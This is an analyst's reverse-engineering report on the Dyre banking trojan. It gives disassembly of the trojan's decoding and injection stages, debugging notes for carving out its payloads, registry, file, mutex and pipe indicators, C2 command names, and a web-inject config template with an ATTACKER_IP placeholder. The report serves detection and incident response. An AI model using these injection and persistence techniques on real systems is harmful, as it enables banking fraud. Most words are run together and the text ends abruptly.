Dyre Analysis

DyreInfectionAnalysisbyAlexanderHanel2014/11/24Version1.0

[email protected]

ExecutiveSummaryIntroduction

FamilyNamePropagationSampleAnalyzed

InstallationStage1stage2Stage3Stage4Stage5Stage6Stage7

GeneralDetailsandFunctionalityPersistenceRegistry

ServiceRunKey

DroppedFilesService

PipesMutex

FunctionalityOverviewEnumeratingprocessesProcessInjectionHostIPRetrievalVNCCommands&Configurations

Commands&ConfigurationsErrorCodes

HooksFireFoxHooksInternetExplorerHooksChromeHooks

AntiDetectionfunctionalityDisablingRapportGP

CommandandControlThirdPartyResourcesURLs&IPsNetworkTrafficPatterns

Appendix:Strings

Stage6DyreStage7InjectedProcess

ThirdPartyAnalysis

Executive Summary ThisdocumentisananalysisoftheDyrebankingmalware.ItisintendedtoaidinunderstandinghowDyreexecutesandinteractwiththeoperatingsystem.Thetargetedaudienceismalwareanalyst,reverseengineers,systemadministrators,incidentrespondersandforensicinvestigators.HopefullyanindividualinvestigatinganincidentcouldusethisdocumenttodetermineiftheinfectionisDyreornot.

Introduction DyreisbankingtrojanthatfirstwasfirstseeninJuneof2014.Intermsofbankingmalwarethefamilyisratherrecent.MostorganizationsandemailprovidershavebeenhitwithaspamcampaignsthateitherlinkstoanexploitkitthatdropsDryeorhavebeensentanemailwithazipattachmentthatcontainsaDyreexecutable.ThisdocumentcoverfeaturesoftheDyrethatIfoundinteresting.Duetothesizeofthecodenotallfeaturesarecovered.ThesampleIoriginallystartedwithwasanoldersample.Newersamplesthatdroppedaservicecrashedinmytestenvironment.Ifyouwouldliketocontributetothisreportpleaseshootmeanemail.

Family Name Dyre Dyreza Dyzap Battdil

Propagation DyreisusuallydownloadedbyalightweighttrojandownloadernamedUpatre.Thetwofamiliessharethesamepacker/obfuscation.Asofthetimeofthiswriting,Upatreismostcommonlyexecutedbyusersbeingsocialengineeredtoopenazipfileandexecuteit.TheuserswillreceiveanemailmasqueradingtobefromofaknownentitysuchasWellsFargo,IRS,Amazon,etc.Theemailwillrequesttheusertoopentheattachment.OnceopeneditwilldownloadDyre.

Sample Analyzed FileHash 099c36d73cad5f13ec1a89d5958486060977930b8e4d541e4a2f7d92e104cd21FileSize 440kBFileModificationDate/Time2014:09:2022:28:0004:00FileAccessDate/Time 2014:11:1117:28:1605:00FileCreationDate/Time 2014:11:1117:25:4305:00FileType Win32EXEMIMEType application/octetstreamMachineType Intel386orlater,andcompatibles

https://docs.google.com/document/d/1Od7j_H04d_IQOpK4Kkw3vQemEZC_3bAJG-6jekK0xDc/edit#heading=h.dchsoy8hdp3hhttps://docs.google.com/document/d/1Od7j_H04d_IQOpK4Kkw3vQemEZC_3bAJG-6jekK0xDc/edit#heading=h.dchsoy8hdp3hhttps://docs.google.com/document/d/1Od7j_H04d_IQOpK4Kkw3vQemEZC_3bAJG-6jekK0xDc/edit#heading=h.dchsoy8hdp3h

TimeStamp 2014:08:1408:46:2204:00PEType PE32LinkerVersion 6.2CodeSize 376832InitializedDataSize 73728UninitializedDataSize 0EntryPoint 0x3eec3OSVersion 4.0ImageVersion 0.0SubsystemVersion 4.0Subsystem WindowsGUIFileVersionNumber 2.4.0.8376ProductVersionNumber2.4.0.8376FileFlagsMask 0x0000FileFlags (none)FileOS WindowsNT32bitObjectFileType ExecutableapplicationFileSubtype 0LanguageCode English(U.S.)CharacterSet Windows,Latin1FileDescription ViewerPDFFileVersion 2.4.0.8376LegalCopyright Copyright20062013allauthors(GPLv3)OriginalFilename ViewerPDF.exeProductName ViewerPDFProductVersion 2.4.0.8376

Installation Dyreexecutesinsevenstages.Inordertounderstandtheinstallationprocessitisusefultoknowthedifferentstages.Byknowingthesestagesitcanaidindetection.StagesDescription

1. Executableondisk,nonexecuted.2. Thesampleisloadedinmemory,executingandmodifyingitsownmemory.3. PositionindependentcoderunninginallocatedmemorytodecodeoriginalDyre

installer. 4. Dyreinstaller.5. Positionindependentcodeinjectedintosvchost.exeorexplorer.6. DryeinjectedDLLrunninginsvchost.exeorexplorer.**7. InjectedDLLrunninginbrowsermemoryspace.**

**TheDLLwillnotshowupasaloadedmodule.Note:Thebelowstageswerebasedoffofonevariant.Detailssuchasfolderpaths,filenamesorinjectedprocessesvary.TheGeneralDetailsandFunctionalitysectioniswrittentocovermoreindicatorsofthedifferentvariants.

Stage 1 AspreviouslymentionedUpatreandDyresharethesameobfuscationtool.Inthisstagethesamplesareverysimilarexceptforacoupleofdifferences.Themostnotabledifferencesistheimport.BelowistheimportsforUpatre.MostoftheMSVCRTAPIsareinvokedduringtheWinMain.Note:Partsofthiscanbealittleesotericandmaybeonlyinterestingtomyselfand/orotherswholiketounderstandifilerandomization.AddressOrdinalName Library 00403000 SetBkColor GDI32 00403008 GetStartupInfoAKERNEL320040300C GetModuleHandleAKERNEL3200403010 GetModuleHandleWKERNEL3200403014 CloseHandle KERNEL3200403018 CreateFileW KERNEL320040301C WriteFile KERNEL3200403020 ReadFile KERNEL3200403028 __getmainargs MSVCRT 0040302C _controlfp MSVCRT 00403030 _except_handler3MSVCRT 00403034 __set_app_typeMSVCRT 00403038 __p__fmode MSVCRT 0040303C __p__commode MSVCRT 00403040 _adjust_fdiv MSVCRT 00403044 __setusermatherrMSVCRT 00403048 _exit MSVCRT 0040304C _XcptFilter MSVCRT 00403050 exit MSVCRT 00403054 _acmdln MSVCRT 00403058 _initterm MSVCRT 00403060 RegisterClassExWUSER32 00403064 CreateWindowExWUSER32 00403068 GetMessageW USER32 0040306C TranslateMessageUSER32 00403070 DispatchMessageWUSER32 00403074 DefWindowProcWUSER32 00403078 PostQuitMessageUSER32 0040307C ShowWindow USER32 00403080 UpdateWindow USER32 00403084 SetWindowTextWUSER32 00403088 PostMessageW USER32IfyouhavereadmyUpatreSampleSetAnalysisanumberoftheseAPIswilllookfamiliar.GetModuleHandleA,GetStartupInfoA,EnableWindow,etc.

AddressOrdinalNameLibrary 0045D000 GetModuleHandleA KERNEL320045D004 GetStartupInfoA KERNEL320045D2F86336 __imp_?UpdateFrameCounts@CDocument@@UAEXXZMFC42 0045D05C5577 __imp_?ReleaseFile@CDocument@@UAEXPAVCFile@@H@ZMFC42 ...............................0045D0785241 ?PostNcDestroy@CWnd@@MAEXXZMFC42 0045D0744396 __imp_?OnChildNotify@CButton@@MAEHIIJPAJ@ZMFC42 0045D0DC4108 __imp_?IsSelected@CView@@UBEHPBVCObject@@@ZMFC42 0045D06C4242 ?messageMap@CFrameWnd@@1UAFX_MSGMAP@@BMFC42 0045D0681842 ?classCFrameWnd@CFrameWnd@@2UCRuntimeClass@@BMFC42 0045D0645740 __imp_?SaveModified@CDocument@@UAEHXZMFC42 ........0045D354 _setmbcp MSVCRT 0045D350 ??2@YAPAXI@Z MSVCRT .....0045D310 _except_handler3 MSVCRT 0045D30C _controlfp MSVCRT 0045D368 EnableWindow USER32 0045D364 SendMessageA USER32 0045D360 UpdateWindow USER32 0045D35C LoadCursorA USER32OnenoticeabledifferencebetweenthetwosetsisthattheMicrosoftFoundationClassLibraryhasbeenincluded.MostoftheAPIsfromthelibraryarenevercalled.ThepurposeofimportingtheAPIsistoaddmoredataandcodetoaidinaddingdatatohelprandomizetheexecutablefromhashing.ThisisagoodexampleofwhyrelyingonhashingofAPIsisnotalwaysagoodideaforclusteringfamilies.TheauthorsoftheobfuscationtoolusedbyUpatreandDyrehaveaddedslightvariationsthroughpointerarithmetictorandomizethecode.Upatre.text:0040106F_GetImageOptionalHeaderAddressprocnear.text:0040106F mov ecx,[eax+3Ch] note:0x3C .text:00401072 mov [ebp4],eax.text:00401075 and ecx,0FFFFh.text:0040107B add eax,ecx .text:0040107D mov ecx,18h.text:00401082 add eax,ecx.text:00401084 inc ecx.text:00401085 add ecx,0F0h.text:0040108B retn.text:0040108B_GetImageOptionalHeaderAddressendpDrye.text:004469B0_GetImageOptionalHeaderAddressprocnear

.text:004469B0

.text:004469B0 mov [ebp4],eax

.text:004469B3 xor ecx,ecx

.text:004469B5 inc eaxinceaxso[EAX+3Bh]equals[EAX+0x3C]

.text:004469B6 mov cx,[eax+3Bh]

.text:004469BA add eax,ecx

.text:004469BC dec eax

.text:004469BD mov ecx,18h

.text:004469C2 add eax,ecx

.text:004469C4 inc ecx

.text:004469C5 add ecx,0F0h

.text:004469CB retn

.text:004469CB_GetImageOptionalHeaderAddressendp

stage 2 .text:0044F240sub_44F240 procnear CODEXREF:.text:0044F240 push ebp count:1.text:0044F241 mov ebp,esp count:1.text:0044F243 push offset_call_decodercount:1.text:0044F248 call _atexit count:1.text:0044F24D add esp,4 count:1.text:0044F250 pop ebp count:1.text:0044F251 retn count:1.text:0044F251sub_44F240 endpStage2happensafteracallto_atexit.ThisstagewillcallVirtualProtectanddecodestage3.Callingthe_atexitfunctiondirectlywillnotworkbecausethesamplereliesonpredictedvaluesgeneratedbycallinguselessAPIs.TInvokedduringWinMain.text:00401380 mov [ebp34h],eax.text:00401383 mov ecx,[ebp0ACh].text:00401389 call ?GetExStyle@CWnd@@QBEKXZCWnd::GetExStyle(void)Retrievestheextendedwindowstylesofthewindow..text:0040138E mov dword_46C1CC,eax eax=0x100WS_EX_WINDOWEDGEInvokedafter_atexit.text:0043EC95 mov eax,dword_46C1CC.text:0043EC9A sub eax,0F9h 0x1000xf9=7.text:0043EC9F call _thread

.text:0044A790_thread procnear CODEXREF:.text:0044A790 mov ecx,eax eax=7.text:0044A792 sub ecx,7.text:0044A795 test ecx,ecx ecx=0.text:0044A797 jz shortloc_44A7B5.text:0044A799 inc ecx.text:0044A79A retn.text:0044A79A.text:0044A79B db6Ah .text:0044A79C.text:0044A79C jmp fwordptr[eax+19h].text:0044A79C.text:0044A79F db77h.text:0044A7A0 dd0A1640052h,0.text:0044A7A8 dd25896450h,0.text:0044A7B0 dd68685351h.text:0044A7B4 db0D1h.text:0044A7B5.text:0044A7B5.text:0044A7B5loc_44A7B5: CODEXREF:_thread+7j.text:0044A7B5 mov ebp,esp.text:0044A7B7 mov dword_465FE4,esp.text:0044A7BD.text:0044A7BDloc_44A7BD: CODEXREF:_thread+45j.text:0044A7BD push eax.text:0044A7BE mov eax,offsetGetStartupInfoA.text:0044A7C3 mov edx,offsetloc_43EB90.text:0044A7C8 mov eax,[eax].text:0044A7CA mov dword_465FF0,eax.text:0044A7CF pop eax.text:0044A7D0 add edx,eax.text:0044A7D2 push edx 0043EB97.text:0044A7D3 test eax,eax.text:0044A7D5 jz shortloc_44A7BD.text:0044A7D7 call dwordptr[ebp4]0043EB97....text:0043EB97_init_decodeprocnear.text:0043EB97 mov ecx,eax.text:0043EB99 push ecx.text:0043EB9A inc ecx.text:0043EB9B cmp ecx,0Ah.text:0043EB9E jz sub_4469B0

.text:0043EBA4 call sub_4110F0

.text:0043EBA9 mov ecx,42h

.text:0043EBAE push offsetunk_46B194

.text:0043EBB3 lea esi,dword_43F030

.text:0043EBB9 dec ecx

.text:0043EBBA dec ecx

.text:0043EBBB push ecx

.text:0043EBBC mov edx,offset_2ndStage

.text:0043EBC1 push edi

.text:0043EBC2 push edx

.text:0043EBC3 jmp shortloc_43EBDEVirtualProtect

.text:0043EBC5

.text:0043EBC5

.text:0043EBC5loc_43EBC5: CODEXREF:_init_decode+49j

.text:0043EBC5 mov ecx,127 XORLoopCount

.text:0043EBCA mov edi,offset_2ndStage Buffertodecode

.text:0043EBCF inc ecx

.text:0043EBD0 mov eax,dword_465EA2

.text:0043EBD5 call _decode_0

.text:0043EBDA pop eax

.text:0043EBDB inc eax

.text:0043EBDC inc eax

.text:0043EBDD retn

.text:0043EBDE

.text:0043EBDE

.text:0043EBDEloc_43EBDE: CODEXREF:_init_decode+2Cj

.text:0043EBDE call eax VirtualProtect

.text:0043EBE0 jmp shortloc_43EBC5

.text:0043EBE0_init_decode endp.text:00442430_xor_save procnear CODEXREF:decode+6p.text:00442430 mov eax,esi.text:00442432 mov eax,[eax].text:00442434 xor eax,ecx.text:00442436 call save_xored.text:0044243B retn.text:0044243B_xor_save endpRENotes:TobypassthesestagessetabreakpointonVirtualProtectEx,execute,thenahardwarebreakpointontheaddress/secondargumentinVirtualProtect,thenexecute.Thesecondstageisresponsibleforallocatingmemory,decodingabufferusingthesameXORroutineandwritingthethirdstagetoamemory.Settingabreakpointatthelastcalleaxwilltakeustothethirdstage.Seethebelowassembly

0041F620 55 PUSHEBP0041F621 8BEC MOVEBP,ESP0041F623 83C4F4 ADDESP,0C0041F626 8945F4 MOVDWORDPTRSS:[EBPC],EAX0041F629 8B5D08 MOVEBX,DWORDPTRSS:[EBP+8]0041F62C 8B4304 MOVEAX,DWORDPTRDS:[EBX+4]0041F62F 50 PUSHEAX laddofstrVirtualAlloc0041F630 8B5320 MOVEDX,DWORDPTRDS:[EBX+20]0041F633 8B4210 MOVEAX,DWORDPTRDS:[EDX+10]0041F636 50 PUSHEAX0041F637 8B4208 MOVEAX,DWORDPTRDS:[EDX+8]0041F63A FFD0 CALLEAX 00417C60getimportaddress0041F63C 8945F8 MOVDWORDPTRSS:[EBP8],EAX0041F63F 8B4B0C MOVECX,DWORDPTRDS:[EBX+C]0041F642 C1E90C SHRECX,0C0041F645 41 INCECX0041F646 C1E10C SHLECX,0C0041F649 33C0 XOREAX,EAX0041F64B 6A40 PUSH400041F64D 6800100000 PUSH10000041F652 51 PUSHECX0041F653 50 PUSHEAX0041F654 8B45F8 MOVEAX,DWORDPTRSS:[EBP8]0041F657 FFD0 CALLEAX VirtualAlloc0041F659 85C0 TESTEAX,EAX0041F65B 743F JESHORTx.0041F69C0041F65D 8945FC MOVDWORDPTRSS:[EBP4],EAX0041F660 8B7DFC MOVEDI,DWORDPTRSS:[EBP4]0041F663 8B5314 MOVEDX,DWORDPTRDS:[EBX+14]0041F666 53 PUSHEBX0041F667 8B5B10 MOVEBX,DWORDPTRDS:[EBX+10]0041F66A 8B33 MOVESI,DWORDPTRDS:[EBX]0041F66C 0FB70A MOVZXECX,WORDPTRDS:[EDX]0041F66F 83F900 CMPECX,00041F672 740A JESHORTx.0041F67E0041F674 43 INCEBX0041F675 43 INCEBX0041F676 43 INCEBX0041F677 43 INCEBX0041F678 42 INCEDX0041F679 42 INCEDX

0041F67A F3:A4 REPMOVSBYTEPTRES:[EDI],BYTEPTRDS:[ESI]Copydatatoheap0041F67C^EBEC JMPSHORTx.0041F66A0041F67E 5B POPEBX0041F67F 8B7DFC MOVEDI,DWORDPTRSS:[EBP4]0041F682 8B7318 MOVESI,DWORDPTRDS:[EBX+18]0041F685 8B431C MOVEAX,DWORDPTRDS:[EBX+1C]0041F688 8B4B0C MOVECX,DWORDPTRDS:[EBX+C]0041F68B 8B5308 MOVEDX,DWORDPTRDS:[EBX+8]0041F68E FFD2 CALLEDX

rebuildtheimporttable,changethememorywritesandthenfreethememory.Oncethiscompleteditwilljumptothenextstage.RENotes:AneasywaytocarveouttheexecutableissetabreakpointonUnmapViewOfFile,execute,thesetabreakpointonVirtualFree,executethendumpthememorythatisbeingfreed.

Stage 4 ThefourthstageistheDyreDropper.Theentrypointwilllooksomethinglikethis.NoticeEIPpointstoanareaofmemoryastheoriginalbaseaddress..text:004025D0 push ebp.text:004025D1 mov ebp,esp.text:004025D3 and esp,0FFFFFFF8h.text:004025D6 sub esp,5D4h.text:004025DC push ebx.text:004025DD push esi.text:004025DE push edi.text:004025DF push 168h nSize.text:004025E4 lea eax,[esp+5E4h+Data].text:004025EB push eax lpFilename.text:004025EC push 0 hModule.text:004025EE call ds:GetModuleFileNameW.text:004025F4 cmp hHeap,0.text:004025FB jnz shortloc_402618.text:004025FD push 0 dwMaximumSize.text:004025FF push 400000h dwInitialSize.text:00402604 push 40000h flOptions.text:00402609 call ds:HeapCreate.text:0040260F mov hHeap,eax.text:00402614 test eax,eaxNote:Thebelowprocessvariesbetweenversions.SeetheDroppedFilessectionforvariationsondroppedfiles. ThesamplewillcheckthatitisrunningintheApplicationDatafolderbycallingSHGetFolderPathCSIDL_APPDATA.IfthesampleisrunningonWindowsVistaorlateritwillberunningfrom%USERPROFILE%\AppData\RoamingiflowerthanVista%USERPROFILE%\ApplicationData.Ifthesampleisnotrunningin%APPDATA%itwillgeneratearandom15charstringandconcatenatewith".exe"DDoKxGmEEQspft.exeQLysiyFCqsHTenS.exe

rJSyaumrkjfVcxY.exewHepYHNuahJReRa.exeXMoVNxUrnyNxMnH.exeyDDoKxGmEEQspft.exeItwillthenwriteitselfto%APPDATA%andexecuteitwithit'sfilepathasanargument.Ifthesampleisalreadyrunningfrom%APPDATA%itwillcreateamutextoseeifonlyoneinstanceisexecuting..text:004026E8 push offsetaGlobal553wwerd"Global\\553wwerdty7".text:004026ED push 0 bInheritHandle.text:004026EF push 100000h dwDesiredAccess.text:004026F4 call ds:OpenMutexWIfthesampleisexecutingforthefirsttimeitwilldeletethepreviouslyrunexecutable.Thesamplewillthencreatearunkey.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]@="C:\\DocumentsandSettings\\Administrator\\ApplicationData\\XMoVNxUrnyNxMnH.exe"Creatingrulestodetectthecreationofautorunregistrykeysthatpointtofilesin%APPDATA%isaneasywaytoidentifysuspiciousexecutablesfromaHIPSorWindowseventsperspective.AftertheregistrykeyiswrittenthesamplewillcallIsWow64Processtoidentifyifitisrunningona64bitsystem.Itwillthencreateafilemappingofaresourceandadjustit'sprivilegesto"SeDebugPrivilege".OncecompleteditwillcallCreateToolhelp32Snapshottosearchfor"svchost.exe".IftheprocessisrunningasNTAUTHORITY\SYSTEMitwillinjectintotheprocess..text:00401388 push eax pSid.text:00401389 push ebx DomainSid.text:0040138A push WinLocalSystemSid WellKnownSidType.text:0040138C mov [ebp+cbSid],44h.text:00401393 call ds:CreateWellKnownSidfunctioncreatesaSIDforpredefinedaliases......text:004013AA push ecx ReturnLength.text:004013AB push ebx TokenInformationLength.text:004013AC push ebx TokenInformation.text:004013AD push 1 TokenInformationClass.text:004013AF push edx TokenHandle.text:004013B0 mov [ebp+ReturnLength],ebx.text:004013B3 call ediGetTokenInformation

.text:004013B5 call ds:GetLastError

.text:004013BB cmp eax,ERROR_INSUFFICIENT_BUFFER

....

.text:004013F1 lea edx,[ebp+pSid]

.text:004013F4 push edx pSid2

.text:004013F5 push eax pSid1

.text:004013F6 call ds:EqualSidOncetheprocessisinjecteditwillopenthemutexitcreatedearlier.OncethisstageiscompleteditwillcallExitProcess.

Stage 5 Theentrypointoftheinjectedprocessisnottheentrypointoftheexecutablebutthebaseaddressoftheallocatedmemory.Thefirst0x640bytesofthememoryblockcontainspositionindependentcodethatisresponsibleforloadingandrebuildingtheimporttableforanexecutablethatfollowsthecode.Thisapproachisnotablebecauseanyexecutablefilecanbeinjectedintoaprocess.Theembeddedexecutabledoesnotneedtotobemodifiedtoincludepositionindependentcodefunctionality.Offset(h)000102030405060708090A0B0C0D0E0F000000005589E557565152538B7508E8EA010000UWVQRSu....0000001089C38D46615053E8D0020000558D6E51.FaPS...U.nQ00000020894504895D008D86470600008945088BE.]..G...E.00000030864306000089450CE8470100008D8687C...E.G....00000040030000FFD05D31C05B5A595E5FC9C20C...]1[ZY^_.0000005000000000000000000000000000000000................000000600047657450726F634164647265737300.GetProcAddress.seg000:0092000055 push ebpseg000:0092000189E5 mov ebp,espseg000:0092000357 push ediseg000:0092000456 push esiseg000:0092000551 push ecxseg000:0092000652 push edxseg000:0092000753 push ebxseg000:009200088B7508 mov esi,[ebp+arg_0]seg000:0092000BE8EA010000 call GetKernelBaseseg000:0092001089C3 mov ebx,eaxseg000:009200128D4661 lea eax,[esi+61h]seg000:0092001550 push eax "GetProcAddress"

seg000:0092001653 push ebxseg000:00920017seg000:00920017 loc_920017:seg000:00920017E8D0020000 call _IAT_Lookupseg000:0092001C55 push ebpseg000:0092001D8D6E51 lea ebp,[esi+51h]seg000:00920020894504 mov [ebp+4],eaxseg000:00920023895D00 mov [ebp+var_s0],ebxseg000:009200268D86470600+ lea eax,[esi+647h] MZHeaderThememoryoftheinjectedprocesscanbeidentifiedbytheRWXrights.Private(Commit),0x630000,124kB,RWX LoaderCodeMapped(Commit),0xf00000,104kB,RWX DLLPrivate(Commit),0x2410000,3.48MB,RWXDATAPrivate(Commit),0x2792000,504kB,RWX DATA

Stage 6 Theloadedexecutablewillnotcontainthepositionindependentcode.ItwillstartwiththestandardMZ. Offset(h)000102030405060708090A0B0C0D0E0F000000004D5A90000300000004000000FFFF0000MZ............00000010B8000000000000004000000000000000.......@.......0000002000000000000000000000000000000000................00000030000000000000000000000000D8000000...............000000400E1FBA0E00B409CD21B8014CCD215468.....!.L!Th0000005069732070726F6772616D2063616E6E6Fisprogramcanno00000060742062652072756E20696E20444F5320tberuninDOS000000706D6F64652E0D0D0A2400000000000000mode....$.......0000008008EE31684C8F5F3B4C8F5F3B4C8F5F3B.1hL._L._L._0000009045F7CC3B598F5F3B4C8F5E3B8D8F5F3BEY._L.^.._000000A023F9F03B648F5F3B23F9C13B4D8F5F3B#d._#M._000000B023F9C23B4D8F5F3B526963684C8F5F3B#M._RichL._000000C000000000000000000000000000000000................Note:TheC2canbeparsedoutofDATAmemory.Checksifahardcodedmutexstringispresenttodetermineifitisalreadyrunning.Themutexstringisavariationofauthorpressingrandomcharsonthekeyboardswiththeirlefthand"Global\\553wwerdty7".Anexampleofthiscanbeseeninthenameofthelogfile

"d6r5g4da.db"andnamedRCDATA(rawdataresources)"u1xdfy2dv".Thenamedresourcesareusedtostoretheinitialconfigfileandinjectedcode.Createsaconfigurationfilein%APPDATA%directoryOffset(h)000102030405060708090A0B0C0D0E0F000000000500626F746964390000005553455235..botid9...USER500000010344B392D3344384636415F57353132364K93D8F6A_W51260000002030302E4244363246463938304535383000.BD62FF980E580000000303734363733413839454131464138343574673A89EA1FA8450000004046433800500271A88BBDA05E0456F260FC8.P.q^.V`0000005003E3E4255076366F97A4D7068818F67C.%Pv6o..|00000060E22F1BF8 /.AdjusttokentohaveSeDebugPrivilege..text:10004646 call ds:GetCurrentProcess.text:1000464C push eax ProcessHandle.text:1000464D call ds:OpenProcessToken.text:10004653 test eax,eax.text:10004655 jz shortloc_10004696.text:10004657 lea eax,[ebp+NewState.Privileges].text:1000465A push eax lpLuid.text:1000465B push offsetaSedebugprivile"SeDebugPrivilege".text:10004660 push esi lpSystemName.text:10004661 mov [ebp+NewState.PrivilegeCount],1.text:10004668 call ds:LookupPrivilegeValueW.text:1000466E test eax,eax.text:10004670 jz shortloc_1000468D.text:10004672 push esi ReturnLength.text:10004673 push esi PreviousState.text:10004674 push 10h BufferLength.text:10004676 lea eax,[ebp+NewState].text:10004679 push eax NewState.text:1000467A push esi DisableAllPrivileges.text:1000467B push [ebp+hObject]TokenHandle.text:1000467E mov [ebp+NewState.Privileges.Attributes],2.text:10004685 call ds:AdjustTokenPrivileges

Stage 7 ThelaststageistheDLLinjectedintoabrowsersuchasiexplore.exe,firefox.exeorchrome.exe.ThisstagewillonlyhavebeenreachedifDyrehasbeenconnectedtotheinternet.TheinjectedDLLcontains170+functions.Thefunctionsrangefromcreatinghooksinthebrowsers(seeHooks)tomonitortraffic,communicationwiththemainDyreexecutablevianamepipes,reroutingtraffic,etc.Theinjectedmemorywouldhavethebelowcharacteristics.

Private(Commit),0xa00000,96kB,RWX+G

General Details and Functionality

Persistence Dyreusestheregistrytosurviveareboot.

Registry

Service HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateTypedword:00000010HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateStartdword:00000002HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateErrorControldword:00000001HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateImagePathhex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,43,48,55,6e,46,61,57,4c,67,66,4a,54,42,64,77,2e,65,78,65,00,HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateDisplayName"GoogleUpdateService"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdateObjectName"LocalSystem"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate\Security HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate\SecuritySecurityhex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,

Run Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunGoogleUpdate"C:\DocumentsandSettings\Administrator\ApplicationData\googleupdaterr.exe"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run@"C:\DocumentsandSettings\Administrator\ApplicationData\EDPBxttMFiiCodB.exe"

Dropped Files

Service WindowsXPC:\WINDOWS\38f4f489bd7.INI1KB C:\WINDOWS\CHUnFaWLgfJTBdw.exe439KB**C:\WINDOWS\CHUnFaWLgfJTBdw.INI1KB C:\WINDOWS\system32\config\systemprofile\ApplicationData\2ete64.vas2KB

**Theexecutablewiththe15randomupperorlowercasecharsisthemostcommon. XRiderVersionWindowsXPC:\DocumentsandSettings\Administrator\ApplicationData\cmd.exe 291KBC:\DocumentsandSettings\Administrator\ApplicationData\userdata.dat 1KBdiper89VersionWindowsXPC:\DocumentsandSettings\Administrator\ApplicationData\googleupdaterr.exe257KBC:\DocumentsandSettings\Administrator\ApplicationData\userdata.dat1KB C:\DocumentsandSettings\Administrator\ApplicationData\EDPBxttMFiiCodB.exe451KBC:\WINDOWS\system32\config\systemprofile\ApplicationData\d6r5g4da.db1KBC:\WINDOWS\.INI1KB

Pipes Theinjectedprocesscommunicatestothemainprocessbyusingnamedpipes.Thenamesarehardcodedsimilartothemutexes.Thepipeiscreatedinstage6.seg000:00A05044 push 0seg000:00A05046 push 0seg000:00A05048 push 3seg000:00A0504A push 0seg000:00A0504C push 0seg000:00A0504E push 0C0000000hseg000:00A05053 push offseta_PipeCmvn5e4d4"\\\\.\\pipe\\cmvn5e4d4r"seg000:00A05058 call ebxCreateFileWseg000:00A0505A mov esi,eax

Itusesthenamepipetopasscommandandvariablesbackandfourth.Withintheinjectedprocessthereareanumberofdifferentrequestedvariables"btid","ccsr","btnt","slip","newp","slpr"and"ppsr".

\\.\pipe\Xider78Pipe \\.\\pipe\\cmvn5e4d4r \\.\pipe\Diper89Pipe \\.\pipe\net\NtControlPipe10(

Mutex Themutexesarehardcodedandaregeneratedduringstage6.ThebelowmutexeswerefoundviaOSINT.

Global\1g2hk1hyj Global\\553wwerdty7 Global\cdv5b74f5y7 Xider78 Diper89

Functionality Overview ThissectioncontainsgenericfunctionalitythatDyreiscapableof.Thereisroomforimprovementinregardstothenetworking.

Enumerating processes CallsCreateToolhelp32Snapshottogetasnapshotofallrunningprocesses.ForeachprocessnameitcallsStrStrIWtoseeifthesearchedprocessmatches.Ifnot,itwillcallProcess32NextWtogetthenextprocessname.Instage4explorer.exeorsvchost.exeissearchedfor.Instage6theinjectedprocesssearchesforchrome.exe,firefox.exeandoriexplore.exe

Process Injection TheprocessinjectionusesNtMapViewOfSection,VirtualAlloc,NtQuerySystemInformation,OpenThreadandNtQueueApcThreadratherthanthestandardWriteProcessMemory,SetThreadContextandCreateRemoteThread.

Host IP Retrieval GetsIPfromstunserverorthirdpartyservice.PleaseseethesectionNetworkTrafficPatternsformoredetails.

VNC ThecoderesponsibleforVNCisaseparatemodule.Itisnotpresentintheexecutable.ThemodulelookstobeaDLLthathasthreeknownexportsofClientSetModule,VncStartServer

andVncStopServer.ThelaterexportnamesarepresentintheCarberpsourceleakatCarberp/sourceabsource/pro/allsource/hvnc_dll/HVNCLib/hvnc.h.Thereisthepossibilitythisisamodifiedversionoftheleakedcodebutwithoutthemodulethereisnowaytoknowforsure.Thissamefunctionisalsousedforthetv32cmd.ThemodulesareinternallynamedVNCModuleandTVModule.Otherfunctionalitynotworthresearching

DecryptingoffilesstoredasRCDATAintheresources Creationandexecutionoffilesinthe%TEMP%directory Storesconfigurationinalogfile RequireshavingSeDebugPrivilegerights Collectsinformationaboutthehost. Redirects

Commands & Configurations

Commands & Configurations Someoftheseareinternalcommandthatarepassedthroughthenamedpipewhileotherarecommandsfromthecommandandcontrol.

sfile sendfile logkeys logpostlogPOSTrequests cert vnc32 tv32 bcc browsnapshot generalinfo httprdc btidpassedonthepipe ccsr btnt slip pls spp setp newpnewprocess. slpr ppsr

Injects Configurations TheconfigurationsforthebrowserinjectsarestoredasXML.Theseareusedinstage7intheinjectedprocess.Therearethreeparenttagsserverlist,localitemsandrpci.

BANK_URLATTACKER_IP:PORTSUB.BANK_URL.com/FOLDER/*SUB.BANK_URL1.com/FOLDER/*SUB.BANK_URL2.com/FOLDER/*UnfortunatelyIcouldnotfindanexampleforrpci.

Error Codes Dyrehasanextensiveerrorhandlingandfeedbackforthedevelopers.Errorhandlingfunctionalitycanbefoundthroughoutthecode

